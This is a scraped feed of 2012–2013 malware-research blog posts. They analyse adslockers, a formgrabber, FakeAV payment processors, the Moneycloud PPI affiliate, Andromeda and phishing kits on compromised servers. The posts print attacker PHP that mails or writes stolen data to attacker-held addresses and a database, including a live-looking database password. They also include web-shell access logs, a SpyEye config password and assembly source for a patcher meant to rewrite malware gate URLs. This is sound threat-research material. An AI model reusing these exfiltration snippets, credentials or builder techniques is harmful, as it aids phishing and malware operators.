Quantcast
Viewing all 128 articles
Browse latest View live

AVScanner Source

December 11, 2012, 12:38 pm
Search

DeadLine's Survey Builder (Adslocker)

December 11, 2012, 12:38 pm
$
0
0
Another 'adslock' this time in .NET (so yeah, that come from HF)
Image may be NSFW.
Clik here to view.

Webcheck:
Image may be NSFW.
Clik here to view.
It open a webpage to a text file and look on the txt your hwid, on the list ? allowed.

Builder:
Image may be NSFW.
Clik here to view.

Image may be NSFW.
Clik here to view.

Locker:
Image may be NSFW.
Clik here to view.

Designed to fail.
Open 'random' program not so random, just predefined urls:
Image may be NSFW.
Clik here to view.
And the infected guys must use the 'C' letter for Windows (lol?)
Another example:
Image may be NSFW.
Clik here to view.

Write words, not so random, predefined once again:
Image may be NSFW.
Clik here to view.

Open random predefined sites:
Image may be NSFW.
Clik here to view.

url/pw stored in plain:
Image may be NSFW.
Clik here to view.

For the rest it's just like usual infections, registry persistence via HKCU[...]CurrentVersion\Run, etc...
AdsLocker seems fashion on hackforum since Adslock.A
RazorLock:
Image may be NSFW.
Clik here to view.

FileIce open source AdsLock:
Image may be NSFW.
Clik here to view.

Another AdsLock from HF:
Image may be NSFW.
Clik here to view.

Please guys.. no more .NET

Raspberry Pi

December 11, 2012, 12:39 pm

Web Crab formgrabber

December 11, 2012, 12:39 pm
$
0
0
And to finish my hackforum tour for the day...
Advert:
Image may be NSFW.
Clik here to view.

9Kb with UPX:
Image may be NSFW.
Clik here to view.

Looking for process:
Image may be NSFW.
Clik here to view.

Open process:
Image may be NSFW.
Clik here to view.

WriteProcess:
Image may be NSFW.
Clik here to view.

Image may be NSFW.
Clik here to view.

And CreateRemoteThread. (the first time i run the malware made Firefox crashed, second time it worked)
So let's debug Firefox...

Image may be NSFW.
Clik here to view.

when i try to log in on virustotal:
Image may be NSFW.
Clik here to view.

POST req are intercepted:
Image may be NSFW.
Clik here to view.

Data are enc and send to the panel (here it's localhost/development/panel.php)
Image may be NSFW.
Clik here to view.

If you look for the sample...
http://www.kernelmode.info/forum/viewtopic.php?f=16&t=2234

Talking to a FakeAV black processing service

December 20, 2012, 3:21 am
$
0
0
Finding a payement processor for black is complicated and private kind of business because they are connected with banks and real life, in 2011 most of FakeAV program was in difficulty due to the ChronoPay story.

Good example of a know payment processor:
Image may be NSFW.
Clik here to view.
Image may be NSFW.
Clik here to view.
130.185.108.163:
Image may be NSFW.
Clik here to view.
130.185.108.162:
Image may be NSFW.
Clik here to view.
130.185.108.161:
Image may be NSFW.
Clik here to view.
 130.185.108.157:
Image may be NSFW.
Clik here to view.
130.185.108.156:
Image may be NSFW.
Clik here to view.

Used by Security Monitor 2012 and many others, landing are still in place:
Image may be NSFW.
Clik here to view.

Let's contact a payement guys:
Image may be NSFW.
Clik here to view.

First approach:
Image may be NSFW.
Clik here to view.
He answered that they work through lithuana bank and want 20% from revenue.
They are not connected with ChronoPay and have just finished a new project (now in test)

One week later:
Image may be NSFW.
Clik here to view.

I asked him about security, trustworthness of the bank, offshore account, type of payments, duration of payments, etc.
He said they can transfer money via LR, WM, Wire Transfer, cash and an offshore is needed to transfer money via wire.
He said the bank knows about malware and won't cooperate with police
He also said that i need hosting and clean domains, then he would give me all instructions to make a payment page.
I've not coded a Fake-FakeAV affiliate but that can be a future project to trap payement processors and fakeav actors.


HS: Thanks for the postcard /a/non, received everything and i still wait 25 dec to unbox the rest, meri kurisumasu to you too (´・ω・`)

It's the end of Citadel ?

December 21, 2012, 4:57 am
$
0
0
Not the end of world like Mayan calendar predict but the end of Citadel.
Since November, Aquabox have misteriously vanished of forums and jabber.

He even got banned on a underground forum
Image may be NSFW.
Clik here to view.

Last CRM (Customer Relationship Management) url:
Image may be NSFW.
Clik here to view.

Image may be NSFW.
Clik here to view.

And shutdown later, leaving just a edited post end of november:
Citadel 1.3 - FF / IE / Chrome Grabber / Video Recording, AntiTracker Protection & CRM
removed
Last edited by AquaBox; 28th November 2012

So we will probably not see the Winter update.
Image may be NSFW.
Clik here to view.

But who care... Carberp is back, customers will probably just move now (like for SpyEye)
Image may be NSFW.
Clik here to view.

Image may be NSFW.
Clik here to view.

Moneycloud PPI Affiliate (Simda.A)

December 27, 2012, 4:33 am
$
0
0
New PPI affiliate appeared
Image may be NSFW.
Clik here to view.

I know it since the begining i was just bored to have a look..
Image may be NSFW.
Clik here to view.
Image may be NSFW.
Clik here to view.
 Via mails etc....

Advert:
Image may be NSFW.
Clik here to view.

Statistic screenshot of a guys inside:
Image may be NSFW.
Clik here to view.

ICQ:
Image may be NSFW.
Clik here to view.

It's the end of 2012 so.. wanna laugh a bit ?
For fake screenshots i've not used a hacked server, i've just browsed hackforum and 'steal' a screenshot:
Image may be NSFW.
Clik here to view.

Hide the notepad and bot last response with my icq discution:
Image may be NSFW.
Clik here to view.

mfw:
Image may be NSFW.
Clik here to view.

Was a bit delicate after he wanna test me:
Image may be NSFW.
Clik here to view.

I've made him wait the time i found a solution without harming people..
Finaly after that i was ready... but the support was away...

Affiliate page was not difficult to find, you just have to search the mail adress he used for icq.
Image may be NSFW.
Clik here to view.

And we have...
• dns: 1 ›› ip: 111.90.159.122 - adresse: MONEYCLOUD.SU• dns: 1 ›› ip: 46.183.220.14 - adresse: MCSTAT.SU

Image may be NSFW.
Clik here to view.
Hosted by Piradius.

Login page:
Image may be NSFW.
Clik here to view.

More cool you can even play to the game of 'who joined the aff'
If a member don't exist on the affiliate you will get this error message:
Image may be NSFW.
Clik here to view.
If the guys exist:
Image may be NSFW.
Clik here to view.
They have a 'test' account:
Image may be NSFW.
Clik here to view.
>username exist
>Invalid username
Image may be NSFW.
Clik here to view.


Ok, enought trolling, after 4 hours of idling the support is back on ICQ:
Image may be NSFW.
Clik here to view.

The account creation took 30 mins hmm... ok i've wait 1h in final:
Image may be NSFW.
Clik here to view.

Dashboard:
Image may be NSFW.
Clik here to view.

Stats:
Image may be NSFW.
Clik here to view.

Payements:
Image may be NSFW.
Clik here to view.

EXE download:
Image may be NSFW.
Clik here to view.

Profile:
Image may be NSFW.
Clik here to view.

So i've looked the source and...
Image may be NSFW.
Clik here to view.

add-teammember:
Image may be NSFW.
Clik here to view.
add-project:
Image may be NSFW.
Clik here to view.
categories:
Image may be NSFW.
Clik here to view.
I've says i will not troll them but it's hard to resist.
Wan't have a look on admin mode ?
 Dashboard:
Image may be NSFW.
Clik here to view.

Add a new member:
Image may be NSFW.
Clik here to view.

Add category:
Image may be NSFW.
Clik here to view.

User list:
Image may be NSFW.
Clik here to view.

Modify news:
Image may be NSFW.
Clik here to view.

Image may be NSFW.
Clik here to view.

Profile update:
Image may be NSFW.
Clik here to view.

Write batch:
Image may be NSFW.
Clik here to view.

Found also the way to view profil of guys
Image may be NSFW.
Clik here to view.


Image may be NSFW.
Clik here to view.
And what's do they load ?
Image may be NSFW.
Clik here to view.
Okay i even no need to reverse it, thanks !

For the sample he asked me to do 20-30 loads: https://www.virustotal.com/file/9d6367cca7b0de6f574ac622d7c12ef22d58b5268b12db9bd82de0d6b40ad184/analysis/1356133199/

File downloaded from the panel: https://www.virustotal.com/file/6a9683f64045ac8c95f77544125d8127cb889e69787fdb0c2ee7ffc861c425e5/analysis/1356140250/

No, seriously the file is interesting, it's a trojan downloader which payload is rootkit with file infector capabilities (infects fastfat.sys) + exploit on board (brief looking revealed CVE-2010-3338) + a lot of antivm, anti forensics and a bitcoin miner under VB RunPE.

I've grabbed the admin IP also but he's behind a proxy.
Moment : 22/12/2012 17:47:59
Ip : 95.140.125.62
Host : free-125-62.mediaworksit.net
ref : Unspecified
ua: Mozilla/5.0 (X11; Linux i686; rv:17.0) Gecko/20100101 Firefox/17.0
Moment : 22/12/2012 17:48:14
Ip : 95.140.125.62
Host : free-125-62.mediaworksit.net
ref : Unspecified
ua: Mozilla/5.0 (X11; Linux i686; rv:17.0) Gecko/20100101 Firefox/17.0




Happy holidays and see you in 2013!
Image may be NSFW.
Clik here to view.

Phish-BankFraud/PHP.Mailer/PHP.Shell

January 14, 2013, 3:03 pm
$
0
0
Investigation on some compromised servers used for phishings during these two weeks. (part 2 of Phishing Hunting, a bit more technical now)
The first site is gtmaustralia.com.au, phishing mirrors:
http://www.phishtank.com/phish_detail.php?phish_id=1693107
http://www.phishtank.com/phish_detail.php?phish_id=1693117
Targeting Paypal, the compromised server run Joomla 1.5.20 Stable Release [18-July-2010]

Hacker used a phishing redirector, on another compromised server running Wordpress:
http://www.firstimpressionsimageconsulting.com/wp-includes/SimplePie/Decode/HTML/
VT 0/46 - VT 3/34

Severals backdoors was found:
Image may be NSFW.
Clik here to view.
VT 21/46

And a WSO Shell with obfuscated code to avoid antivirus.
Image may be NSFW.
Clik here to view.
VT 18/46

From server side, resend.php send phished datas to the hacker:
$samaka="asq01@hotmail.fr";
$subject="Off $ip";
$from="From: InfoRmation<google@gmail.com>";
$from.="-Info\n";
mail($samaka,$subject,$message,$from);

The server was aslo used to target EDF (Electricité de France)
http://www.phishtank.com/phish_detail.php?phish_id=1693109
VT 0/46

Datas are still send via e-mail, sniper.php:
<?php$to="wait0all@gmail.com";$ip=getenv("REMOTE_ADDR"

Cielo targeted, VT 5/46
http://www.phishtank.com/phish_detail.php?phish_id=1693131
$headers="Content-type: text/html; charset=iso-8859-1\r\n";
$headers.="From: Cielo <desejovip@hotmail.com";

And also Banco do Brasil, VT 0/46
http://www.phishtank.com/phish_detail.php?phish_id=1693133
It's alot of phishs for just one server and it's not finished, the server was also used for spam:
Image may be NSFW.
Clik here to view.
VT 0/46

Image may be NSFW.
Clik here to view.
VT 9/46

Now by viewing access logs i suspect 41.249.93.120:
41.249.93.120 - - [01/Jan/2013:04:41:48 +1100] "GET /*********.php HTTP/1.1" 200 36209 "-" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
41.249.93.120 - - [01/Jan/2013:04:39:47 +1100] "POST /media/*********/rsform_backup_2010-09-30_183530.php?x&action=upload&chdir=/home/gtmaustr/public_html/media/**************/ HTTP/1.1" 200 11887 "http
[Tue Jan 01 04:35:41 2013] [error] [client 41.249.93.120] File does not exist: /home/gtmaustr/public_html/media/*********/imagens/pontabarramarela.png, referer: http://www.gtmaustralia.com.au/media/*********/cc/css/padrao3.css
[Tue Jan 01 04:35:41 2013] [error] [client 41.249.93.120] File does not exist: /home/gtmaustr/public_html/404.shtml, referer: http://www.gtmaustralia.com.au/media/*********/cc/css/padrao3.css
69.171.247.115 - - [01/Jan/2013:10:42:23 +1100] "GET /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 13565 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
41.140.27.175 - - [03/Jan/2013:04:52:00 +1100] "GET /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 13564 "-" "Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0"
41.248.194.138 - - [03/Jan/2013:07:01:16 +1100] "GET /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 14197 "-" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
200.140.128.46 - - [04/Jan/2013:13:46:34 +1100] "GET /media/rsformbkp4ca44bd2799a5/rsform_backup_2010-09-30_183530.php?x&chdir=/home/gtmaustr/public_html/media/ HTTP/1.1" 200 14111 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.101 Safari/537.11"
41.248.111.156 - - [06/Jan/2013:03:46:30 +1100] "GET /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 14197 "-" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
196.217.22.177 - - [07/Jan/2013:01:36:17 +1100] "GET /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 14197 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11"
201.24.48.2 - - [07/Jan/2013:08:44:05 +1100] "GET /media/rsformbkp4ca44bd2799a5/rsform_backup_2010-09-30_183530.php?x&action=edit&chdir=/home/gtmaustr/public_html/media/&file=C.php HTTP/1.1" 200 19077 "http://gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/rsform_backup_2010-09-30_183530.php?x&chdir=/home/gtmaustr/public_html/media/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.101 Safari/537.11"
41.140.96.122 - - [07/Jan/2013:21:45:20 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 8643 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11"
105.137.51.125 - - [09/Jan/2013:01:05:07 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 15203 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11"
41.249.80.218 - - [10/Jan/2013:04:50:48 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 12376 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
41.140.101.235 - - [10/Jan/2013:08:05:29 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 16950 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
186.215.83.228 - - [10/Jan/2013:08:29:16 +1100] "GET /media/rsformbkp4ca44bd2799a5/rsform_backup_2010-09-30_183530.php?x&action=edit&chdir=/home/gtmaustr/public_html/media/&file=C.php HTTP/1.1" 200 19077 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/rsform_backup_2010-09-30_183530.php?x&action=backtool&chdir=/home/gtmaustr/public_html/media/" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11"
105.141.50.243 - - [10/Jan/2013:09:58:47 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 13090 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
105.142.9.86 - - [10/Jan/2013:16:07:11 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 8607 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
105.139.10.216 - - [11/Jan/2013:01:06:34 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 13090 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
41.249.115.245 - - [11/Jan/2013:02:48:02 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 14371 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
69.171.237.11 - - [11/Jan/2013:03:40:37 +1100] "GET /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 13564 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
41.250.159.131 - - [11/Jan/2013:03:40:38 +1100] "GET /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 13565 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11"
41.250.159.131 - - [11/Jan/2013:03:44:24 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 13613 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0"
41.249.24.120 - - [11/Jan/2013:08:09:05 +1100] "GET /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 13564 "-" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
177.43.16.17 - - [11/Jan/2013:09:31:47 +1100] "GET /media/rsformbkp4ca44bd2799a5/rsform_backup_2010-09-30_183530.php?x&action=edit&chdir=/home/gtmaustr/public_html/media/&file=C.php HTTP/1.1" 200 19077 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.101 Safari/537.11"
105.137.137.86 - - [11/Jan/2013:13:05:31 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 14216 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
41.143.4.42 - - [12/Jan/2013:00:45:23 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 11412 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0"
41.248.178.222 - - [12/Jan/2013:06:46:17 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 14494 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
41.249.146.131 - - [12/Jan/2013:06:58:29 +1100] "GET /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 14206 "-" "Mozilla/5.0 (Windows NT 5.1; rv:15.0) Gecko/20100101 Firefox/15.0"
105.139.9.75 - - [12/Jan/2013:12:55:20 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 14369 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
41.137.59.63 - - [12/Jan/2013:16:18:09 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 20120 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 5.1; rv:15.0) Gecko/20100101 Firefox/15.0.1"
46.165.221.230 - - [12/Jan/2013:18:09:41 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 13090 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"

Second case (and probably same guys behind)
Phishing targeting EDF:http://www.phishtank.com/phish_detail.php?phish_id=1693105
The server is running Joomla here again.

This time, log files was cleared.
I've posted previous infos including log files on kernelmode. (did they read me ?)
Image may be NSFW.
Clik here to view.

Datats are still send via mail, index3.php:
$myemail="jinshoori@gmail.com,t0od@hotmail.fr";

loginAction.action.php:
$myemail="jinshoori@gmail.com";//email hna

And used as spam relay here again:
Image may be NSFW.
Clik here to view.

Shell found this time was a edited version of Backdoor.PHP.WebShell.BD:
Image may be NSFW.
Clik here to view.

On a similar case i coded a tool to retrieve phishing urls from rotators:
Image may be NSFW.
Clik here to view.

Server was satured later:
Image may be NSFW.
Clik here to view.

Open dir:
Image may be NSFW.
Clik here to view.

They make different dirs with phishing pages to evade antivirus:
Image may be NSFW.
Clik here to view.

Last case was a Paypal phish page found by markusg targeting German people.
Server is running wordpress.
http://www.phishtank.com/phish_detail.php?phish_id=1694455

Not same guys, not same technic.
This time, datas are sent to a mySQL db on another compromised server:
mysql_connect("193.107.19.***","ccs","LTBDVQ7bYewff5Dc");
mysql_select_db("ccs");
$url=mysql_real_escape_string($_S

'ccs' make me think 'Credit Card Sell'
On the server where datas are sent the hacker use a parser for credit cards.
Image may be NSFW.
Clik here to view.

Image may be NSFW.
Clik here to view.
The server was also used for spam:
Image may be NSFW.
Clik here to view.
VT 5/46

Datas collected are probably used to supply carding shops.

You can find more research/dumped phishing pages/spam tools/additional files here including mail source, and here for dumped backdoors.
Also interesting: Unixfreakjp have do a post about the connection of backdoors and exploit kits here

Image may be NSFW.
Clik here to view.
Search

Black processing service for malware only

January 18, 2013, 3:06 am
$
0
0
Adv:
Image may be NSFW.
Clik here to view.

Shortened a bit:
good Internet day =)
I'm looking for a partner with working spyware or an owner of affiliate program
I have a working merchant for plastic cards, for high risk. (not for carding)

Some companies are registered; online-banking is included.
I can give online (probably, access to online banking) to a partner.
Payments just one time in a week (one time in 4 business days).
The number of chargebacks is 6%.

Expenses for processing:
1) 10 hold (don't undestand this number) for 180 days - it won't be returned, it will be used for chargeback and refunds
2) processing costs 5%, 10% - bribes;
3) conversion from offshore wire to WM costs 5%
average expenses are 30%; It is nice to give 40-50% to adverts
I can divide profit by 50 on 50%; (in case of high profit the percent can be changed to 70/30)
$Contragents will compensate up to $100k.
It (merchant, probably) will live approximately for 3 months after start.
Just spyware, not viagra/pharma.
Starting date - 7 of July.
P.S. Merchant is ready !

Image may be NSFW.
Clik here to view.

Andromeda bot

January 18, 2013, 3:06 am
$
0
0

Come from a Keitaro TDS: http://urlquery.net/report.php?id=756624
Image may be NSFW.
Clik here to view.

 Lead on: ald-facebook.co.uk/operations/outer_band_remote.php
Payload: http://vxvault.siri-urz.net/ViriFiche.php?ID=22729

Andromeda 2.6, probably made by the Andromeda builder
Image may be NSFW.
Clik here to view.

Bots:
Image may be NSFW.
Clik here to view.

Blacklist:
Image may be NSFW.
Clik here to view.

Task:
Image may be NSFW.
Clik here to view.
output.exe is SpyEye, pass for config: FD0CCB937D91AD7355A4B072D91EB1B8
Second file is Sirefef CLSID edition.

Edit task:
Image may be NSFW.
Clik here to view.

Service:
Image may be NSFW.
Clik here to view.

Socks:
Image may be NSFW.
Clik here to view.

Formgrabber:
Image may be NSFW.
Clik here to view.
Nothing really interesting at all.


Image may be NSFW.
Clik here to view.

How to hex a malware and make a builder

January 20, 2013, 1:25 pm
$
0
0
Hello, a tutorial made some weeks ago on Trojanforge, got the idea to write after seeing this:
Image may be NSFW.
Clik here to view.

And also because malware builders seems to be fashion these days.
When malware writers give only bins and no builder, the only way to fuck them up is to codecave the bin for make it do what we want.
You have many advantages because you can remove bugs, add features... you are free.
For make this, you will need: .ollydbg, HexDecCharEditor v1.02 (or any other hex editor) and a minimum of intelligence.

For the coding part i've choose 2 languages: Visual Basic 6 and Assembly with masm32 and WinASM as IDE. (two extreme, one high and one low-level language)

So let's start.
The first step is to locate things you need to modify inside the malware (e.g: gate urls, timers, enc keys)
For malware, do to ethical issue i will chose a simple unNagMe coded fastly in ASM.
And like that you can try to modify things without the fear of being infected.

Image may be NSFW.
Clik here to view.
This executable can be downloaded with both sources code at the end of this post.

Run Ollydbg and load the executable inside to have a look and see what the code look's like
Image may be NSFW.
Clik here to view.

Pretty simple with a good zone of zero filled bytes, and we see strings are pointing to 0x403000 and 0x403023
We need to find a zone with enought nullbytes to insert our url, the zero filled place on the screenshot can be good but i've choose to add my strings under original one.
This green place can be good and used, i've used HexDecCharEditor to find it:
Image may be NSFW.
Clik here to view.

Now that we have found a place for our URL we need to modify the executable to make it go on our string.
Image may be NSFW.
Clik here to view.

(843, VA=0x403043)
Double click on the line and modify the code, then: Right Click>Copy to executable>All modification
A window appear: Click 'Copy all' then another window appear, right click on it and click "Save file".

Everything is cool now.
We just need to code a program who will edit our binary at 0x403043
For that i will modify some of my old VB6 and ASM codes

Basic interface:
Image may be NSFW.
Clik here to view.

Please note that for Visual Basic i've used a commonDialog mean the program is dependent of one ocx: COMDLG32.
The code for boths are a bit hardcoded and can be improved but that work and it's enought for me.
One the file is builded the hexed version is named "Malware.exe.ViR"
Image may be NSFW.
Clik here to view.

ASM Code, patch.asm:
.386
.model  flat,stdcall
option  casemap:none

include        windows.inc
include        user32.inc
include        kernel32.inc
include        shell32.inc
include        advapi32.inc
include        gdi32.inc
include        comctl32.inc
include        comdlg32.inc
include        masm32.inc
include        /masm32/macros/macros.asm
includelib      user32.lib
includelib      kernel32.lib
includelib      shell32.lib
includelib      advapi32.lib
includelib      gdi32.lib
includelib      comctl32.lib
includelib      comdlg32.lib
includelib      masm32.lib
includelib winmm.lib

DlgProc               Proto    :DWORD,:DWORD,:DWORD,:DWORD
List                  Proto    :DWORD,:DWORD
Patch                 Proto    :DWORD
Scan                  Proto

.data

ProgId          db"RED WM",0           
TargetName      equ "- SomeAppName vX.XX.XXX -",0                         
TargetName2     equ "ExampleApp.exe",0                                     
NameofTarget    db TargetName,0
SecondN     db"Malware.exe.ViR",0 
Sequence        db  00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
                db  00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
                db  00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
                db  00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
WBuffer         db  256dup(00)
PatchOffset     dd 00000843h  ; VA=403043

             

StartNfo     db"* Close the application if open.",0
StartNfo2    db"* Just apply the patch.",0
StartNfo3    db"* Waiting for your order ...",0
;------------------------------------------------
Backup       db"* Offsets patched, Creating Backup...",0
Success      db"* Target patched successfully, n-j0y ;)",0
Version      db"* Invalid File version, or already patched.",0
Nothing     db"* Nothing patched, Aborted*",0
Searching    db"* Analysing offsets...",0
ReadError    db"* Can't Read the file.",0
WriteError   db"* Nothing patched, Aborted*",0
OpenError    db"* File Already open, close the file and retry.",0
;--------------------------------------------------------------------------------------------------------------
FileFilter  db  TargetName2,0
;--------------------------------------------------------------------------------------------------------------



.data?
hInstance       HINSTANCE   ?
hTarget         HINSTANCE   ?
hTargetMap      HINSTANCE   ?
ofn             OPENFILENAME    <>
RBuffer         dd      ?
BytesRead       db      ?
BytesWritten    db      ?
pMapView        dd      ?
FileSize        dd      ?
SearchOffset    dd      ?

hMapping        dd      ?
pMapping        dd      ?
TargetN         db      512dup(?)
inBytes         db      512dup(?)

alen            dd ?


.const
IDD_CRACKME     equ101
IDC_PATCH       equ2001
IDC_EXIT       equ2002
IDC_ABOUT       equ2003
icon            equ2000
IDC_TARGET     equ2006
IDC_LISTBOX     equ1002
IDC_BYTES       equ 2012

.code
 xstart:
    invoke GetModuleHandle, NULL
    mov   hInstance,eax
    invoke InitCommonControls
    invoke DialogBoxParam, hInstance, IDD_CRACKME, NULL,addr DlgProc, NULL
    invoke ExitProcess,eax

aligndword
DlgProc proc hWnd:DWORD,uMsg:DWORD,wParam:DWORD,lParam:DWORD
    ;-------- Load Cursor ---------
    invoke LoadCursor,hInstance,300
    invoke SetCursor,eax
    ;------------------------------
    .if uMsg == WM_INITDIALOG
    invoke LoadIcon,hInstance,icon
    invoke SendMessage,hWnd,WM_SETICON,ICON_SMALL,eax
    invoke GetDlgItem,hWnd,IDC_BYTES
    invoke SendMessage,eax, EM_SETLIMITTEXT,64,0
    invoke SendMessage,hWnd,WM_SETICON,1,eax   
    invoke SetWindowText,hWnd,addr ProgId
    invoke SetDlgItemText,hWnd,IDC_TARGET,addr NameofTarget
    invokeList,hWnd,addr StartNfo
    invokeList,hWnd,addr StartNfo2
    invokeList,hWnd,addr StartNfo3
    invoke SetFocus,eax
.elseif uMsg == WM_COMMAND
       moveax,wParam
.ifeax==IDC_PATCH
        invoke GetDlgItemText,hWnd,IDC_BYTES,addr WBuffer,sizeof WBuffer
        .ifeax == 0 || eax> 64
            invokeList,hWnd,chr$("URL field is either empty or has more than 64 chars!")
            ret
        .endif
            mov ofn.lStructSize,SIZEOF ofn
            mov ofn.lpstrFilter,offset FileFilter
            mov ofn.lpstrFile,offset TargetN
            mov ofn.nMaxFile,512
            mov ofn.Flags,OFN_FILEMUSTEXIST+OFN_PATHMUSTEXIST+\
                            OFN_LONGNAMES+OFN_EXPLORER+OFN_HIDEREADONLY
            invoke GetOpenFileName,addr ofn
            .ifeax==TRUE
                invoke CopyFile,addr TargetN,addr SecondN,TRUE
                invoke Patch,hWnd
        .endif
.elseifeax==IDC_EXIT
    invoke SendMessage,hWnd,WM_CLOSE,0,0
.elseifeax==IDC_ABOUT
    invoke MessageBox,hWnd,chr$("** RED CREW 2013"),chr$("About"),MB_ICONINFORMATION
.endif
.endif
    .if uMsg==WM_RBUTTONDOWN
            invoke ShowWindow,hWnd,SW_MINIMIZE
    .endif
.if uMsg == WM_CLOSE
        invoke  EndDialog, hWnd,0
.endif

    xoreax,eax
    ret

ret
DlgProc endp

Listproc hWnd:HWND, pMsg:DWORD
    invoke SendDlgItemMessage,hWnd,IDC_LISTBOX,LB_ADDSTRING,0,pMsg
